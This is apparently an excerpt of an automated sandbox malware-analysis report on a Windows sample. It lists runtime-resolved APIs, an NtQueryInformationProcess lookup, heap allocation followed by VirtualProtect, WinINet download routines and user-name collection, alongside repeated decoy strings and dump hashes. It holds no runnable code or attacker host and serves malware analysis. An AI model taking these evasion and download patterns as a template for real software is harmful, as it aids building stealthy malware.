                  • GetProcAddress.KERNEL32(75900000,01310C30), ref: 006398BA
                  • GetProcAddress.KERNEL32(75900000,01310CD8), ref: 006398D2
                  • GetProcAddress.KERNEL32(75900000,01310BE8), ref: 006398EA
                  • GetProcAddress.KERNEL32(75900000,01310C00), ref: 00639903
                  • GetProcAddress.KERNEL32(75900000,013191E0), ref: 0063991B
                  • GetProcAddress.KERNEL32(75900000,01305540), ref: 00639933
                  • GetProcAddress.KERNEL32(75900000,013051A0), ref: 0063994C
                  • GetProcAddress.KERNEL32(75900000,01310C48), ref: 00639964
                  • GetProcAddress.KERNEL32(75900000,01310C60), ref: 0063997C
                  • GetProcAddress.KERNEL32(75900000,01310C78), ref: 00639995
                  • GetProcAddress.KERNEL32(75900000,01310D20), ref: 006399AD
                  • GetProcAddress.KERNEL32(75900000,01305520), ref: 006399C5
                  • GetProcAddress.KERNEL32(75900000,01310D38), ref: 006399DE
                  • GetProcAddress.KERNEL32(75900000,01310DB0), ref: 006399F6
                  • GetProcAddress.KERNEL32(75900000,01305280), ref: 00639A0E
                  • GetProcAddress.KERNEL32(75900000,01310DC8), ref: 00639A27
                  • GetProcAddress.KERNEL32(75900000,01310F60), ref: 00639A3F
                  • GetProcAddress.KERNEL32(75900000,01305220), ref: 00639A57
                  • GetProcAddress.KERNEL32(75900000,01310F78), ref: 00639A70
                  • GetProcAddress.KERNEL32(75900000,01305420), ref: 00639A88
                  • LoadLibraryA.KERNEL32(01310EE8,?,00636A00), ref: 00639A9A
                  • LoadLibraryA.KERNEL32(01310FA8,?,00636A00), ref: 00639AAB
                  • LoadLibraryA.KERNEL32(01310F00,?,00636A00), ref: 00639ABD
                  • LoadLibraryA.KERNEL32(01310F18,?,00636A00), ref: 00639ACF
                  • LoadLibraryA.KERNEL32(01310F30,?,00636A00), ref: 00639AE0
                  • GetProcAddress.KERNEL32(75070000,01310F48), ref: 00639B02
                  • GetProcAddress.KERNEL32(75FD0000,01310F90), ref: 00639B23
                  • GetProcAddress.KERNEL32(75FD0000,01319498), ref: 00639B3B
                  • GetProcAddress.KERNEL32(75A50000,01319438), ref: 00639B5D
                  • GetProcAddress.KERNEL32(74E50000,01305320), ref: 00639B7E
                  • GetProcAddress.KERNEL32(76E80000,013191F0), ref: 00639B9F
                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00639BB6
                  Strings
                  • NtQueryInformationProcess, xrefs: 00639BAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: NtQueryInformationProcess
                  • API String ID: 2238633743-2781105232
                  • Opcode ID: cdf0fa955bbf08d9d065f7d2e6384a7e03519458f6e7aaa988a5ca4bafa3fbd1
                  • Instruction ID: 5ccbf5d7499e3581440f0a3bdb69f48e4522901213b186a5d4ac09adb45f198d
                  • Opcode Fuzzy Hash: cdf0fa955bbf08d9d065f7d2e6384a7e03519458f6e7aaa988a5ca4bafa3fbd1
                  • Instruction Fuzzy Hash: BCA182B55002409FC34CEFA8FE8896637FAF74C301706652AE646E3224DBF9A441DF62
                  Function 006245C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 764 6245c0-624695 RtlAllocateHeap 781 6246a0-6246a6 764->781 782 62474f-6247a9 VirtualProtect 781->782 783 6246ac-62474a 781->783 783->781
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0062460F
                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0062479C
                  Strings
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00624638
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00624662
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006246D8
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0062462D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00624678
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006246C2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00624617
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006245F3
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00624765
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006245D2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006246B7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00624622
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0062474F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00624683
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006245DD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0062475A
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00624770
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00624657
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00624734
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00624729
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006245C7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0062471E
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006246CD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00624713
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0062477B
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006246AC
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0062466D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00624643
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0062473F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006245E8
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapProtectVirtual
                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                  • API String ID: 1542196881-2218711628
                  • Opcode ID: 15a48d533cf3c0184e9b16a8f1afb26c07108c3c07171e58e4a6aac0e7501bcd
                  • Instruction ID: 78b7c5914ab6b88702b487ca41e8de4fb756a13d45544abbdeae20b8354245fe
                  • Opcode Fuzzy Hash: 15a48d533cf3c0184e9b16a8f1afb26c07108c3c07171e58e4a6aac0e7501bcd
                  • Instruction Fuzzy Hash: 0A41DA607C2A08EFA7A8FBE4984EE9D77779F4EB24F516044AE2257283CBB05500C536
                  Function 00626280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                    • Part of subcall function 006247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00624839
                    • Part of subcall function 006247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00624849
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  • InternetOpenA.WININET(00640DFE,00000001,00000000,00000000,00000000), ref: 006262E1
                  • StrCmpCA.SHLWAPI(?,0131F730), ref: 00626303
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00626335
                  • HttpOpenRequestA.WININET(00000000,GET,?,0131F490,00000000,00000000,00400100,00000000), ref: 00626385
                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006263BF
                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006263D1
                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006263FD
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0062646D
                  • InternetCloseHandle.WININET(00000000), ref: 006264EF
                  • InternetCloseHandle.WININET(00000000), ref: 006264F9
                  • InternetCloseHandle.WININET(00000000), ref: 00626503
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                  • String ID: ERROR$ERROR$GET
                  • API String ID: 3749127164-2509457195
                  • Opcode ID: a4d667f865228717da852e9952f27cd9c7cbf4890405dd6fcf656467973063f0
                  • Instruction ID: 23d11f0478cabc9d9867bb3c74eb28b290da24a0795332561ed933a5e6141e24
                  • Opcode Fuzzy Hash: a4d667f865228717da852e9952f27cd9c7cbf4890405dd6fcf656467973063f0
                  • Instruction Fuzzy Hash: B2712F71A00218ABDB14EFE0DC45BEE77BABB44700F108198F54A6B2D0DBB46A85DF95
                  Function 00637850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006211B7), ref: 00637880
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00637887
                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0063789F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser
                  • String ID:
                  • API String ID: 1296208442-0
                  • Opcode ID: 69b3bb4c03802c56e83a3e5d829a0f41e7b158905ca1e5650ff602c780a72bbe
                  • Instruction ID: ad6777341428c48dbd91409c4dda52167fa39c6b8ad40ed6960825a097439cf2
                  • Opcode Fuzzy Hash: 69b3bb4c03802c56e83a3e5d829a0f41e7b158905ca1e5650ff602c780a72bbe
                  • Instruction Fuzzy Hash: 87F04FF1D44209ABC714DF98DD49BAEFBB8FB08711F10026AFA05A3680C7B515048FE1
                  Function 00621160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitInfoProcessSystem
                  • String ID:
                  • API String ID: 752954902-0
                  • Opcode ID: b7240986691fd868937bafd61ef5adc2680f5267b364033dbdb8d3bbcb36591f
                  • Instruction ID: 007dd73b86ac1c07a1f3d61bd0643b4942a4cb24d7952d95efe4d3e90acc7e5d
                  • Opcode Fuzzy Hash: b7240986691fd868937bafd61ef5adc2680f5267b364033dbdb8d3bbcb36591f
                  • Instruction Fuzzy Hash: 0BD05E7490430CDBCB04DFE0D84A6DDBB78FB08311F001594D90572340EA709491CEA6
                  Function 00639C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 633 639c10-639c1a 634 639c20-63a031 GetProcAddress * 43 633->634 635 63a036-63a0ca LoadLibraryA * 8 633->635 634->635 636 63a146-63a14d 635->636 637 63a0cc-63a141 GetProcAddress * 5 635->637 638 63a153-63a211 GetProcAddress * 8 636->638 639 63a216-63a21d 636->639 637->636 638->639 640 63a298-63a29f 639->640 641 63a21f-63a293 GetProcAddress * 5 639->641 642 63a337-63a33e 640->642 643 63a2a5-63a332 GetProcAddress * 6 640->643 641->640 644 63a344-63a41a GetProcAddress * 9 642->644 645 63a41f-63a426 642->645 643->642 644->645 646 63a4a2-63a4a9 645->646 647 63a428-63a49d GetProcAddress * 5 645->647 648 63a4ab-63a4d7 GetProcAddress * 2 646->648 649 63a4dc-63a4e3 646->649 647->646 648->649 650 63a515-63a51c 649->650 651 63a4e5-63a510 GetProcAddress * 2 649->651 652 63a612-63a619 650->652 653 63a522-63a60d GetProcAddress * 10 650->653 651->650 654 63a61b-63a678 GetProcAddress * 4 652->654 655 63a67d-63a684 652->655 653->652 654->655 656 63a686-63a699 GetProcAddress 655->656 657 63a69e-63a6a5 655->657 656->657 658 63a6a7-63a703 GetProcAddress * 4 657->658 659 63a708-63a709 657->659 658->659
                  APIs
                  • GetProcAddress.KERNEL32(75900000,013052C0), ref: 00639C2D
                  • GetProcAddress.KERNEL32(75900000,013052E0), ref: 00639C45
                  • GetProcAddress.KERNEL32(75900000,01319648), ref: 00639C5E
                  • GetProcAddress.KERNEL32(75900000,013195B8), ref: 00639C76
                  • GetProcAddress.KERNEL32(75900000,0131DFF8), ref: 00639C8E
                  • GetProcAddress.KERNEL32(75900000,0131DF08), ref: 00639CA7
                  • GetProcAddress.KERNEL32(75900000,0130B7B0), ref: 00639CBF
                  • GetProcAddress.KERNEL32(75900000,0131DFB0), ref: 00639CD7
                  • GetProcAddress.KERNEL32(75900000,0131E0D0), ref: 00639CF0
                  • GetProcAddress.KERNEL32(75900000,0131E028), ref: 00639D08
                  • GetProcAddress.KERNEL32(75900000,0131DEC0), ref: 00639D20
                  • GetProcAddress.KERNEL32(75900000,01305500), ref: 00639D39
                  • GetProcAddress.KERNEL32(75900000,01305300), ref: 00639D51
                  • GetProcAddress.KERNEL32(75900000,01305340), ref: 00639D69
                  • GetProcAddress.KERNEL32(75900000,01305360), ref: 00639D82
                  • GetProcAddress.KERNEL32(75900000,0131E040), ref: 00639D9A
                  • GetProcAddress.KERNEL32(75900000,0131DE78), ref: 00639DB2
                  • GetProcAddress.KERNEL32(75900000,0130B968), ref: 00639DCB
                  • GetProcAddress.KERNEL32(75900000,013053A0), ref: 00639DE3
                  • GetProcAddress.KERNEL32(75900000,0131DF20), ref: 00639DFB
                  • GetProcAddress.KERNEL32(75900000,0131E010), ref: 00639E14
                  • GetProcAddress.KERNEL32(75900000,0131DE90), ref: 00639E2C
                  • GetProcAddress.KERNEL32(75900000,0131E0E8), ref: 00639E44
                  • GetProcAddress.KERNEL32(75900000,01305440), ref: 00639E5D
                  • GetProcAddress.KERNEL32(75900000,0131E070), ref: 00639E75
                  • GetProcAddress.KERNEL32(75900000,0131E058), ref: 00639E8D
                  • GetProcAddress.KERNEL32(75900000,0131E0B8), ref: 00639EA6
                  • GetProcAddress.KERNEL32(75900000,0131E0A0), ref: 00639EBE
                  • GetProcAddress.KERNEL32(75900000,0131DF50), ref: 00639ED6
                  • GetProcAddress.KERNEL32(75900000,0131E088), ref: 00639EEF
                  • GetProcAddress.KERNEL32(75900000,0131DE48), ref: 00639F07
                  • GetProcAddress.KERNEL32(75900000,0131E100), ref: 00639F1F
                  • GetProcAddress.KERNEL32(75900000,0131E118), ref: 00639F38
                  • GetProcAddress.KERNEL32(75900000,0131B5B8), ref: 00639F50
                  • GetProcAddress.KERNEL32(75900000,0131E130), ref: 00639F68
                  • GetProcAddress.KERNEL32(75900000,0131DFC8), ref: 00639F81
                  • GetProcAddress.KERNEL32(75900000,01305460), ref: 00639F99
                  • GetProcAddress.KERNEL32(75900000,0131DEA8), ref: 00639FB1
                  • GetProcAddress.KERNEL32(75900000,01305480), ref: 00639FCA
                  • GetProcAddress.KERNEL32(75900000,0131DE60), ref: 00639FE2
                  • GetProcAddress.KERNEL32(75900000,0131DED8), ref: 00639FFA
                  • GetProcAddress.KERNEL32(75900000,01304F00), ref: 0063A013
                  • GetProcAddress.KERNEL32(75900000,013050E0), ref: 0063A02B
                  • LoadLibraryA.KERNEL32(0131DEF0,?,00635CA3,00640AEB,?,?,?,?,?,?,?,?,?,?,00640AEA,00640AE3), ref: 0063A03D
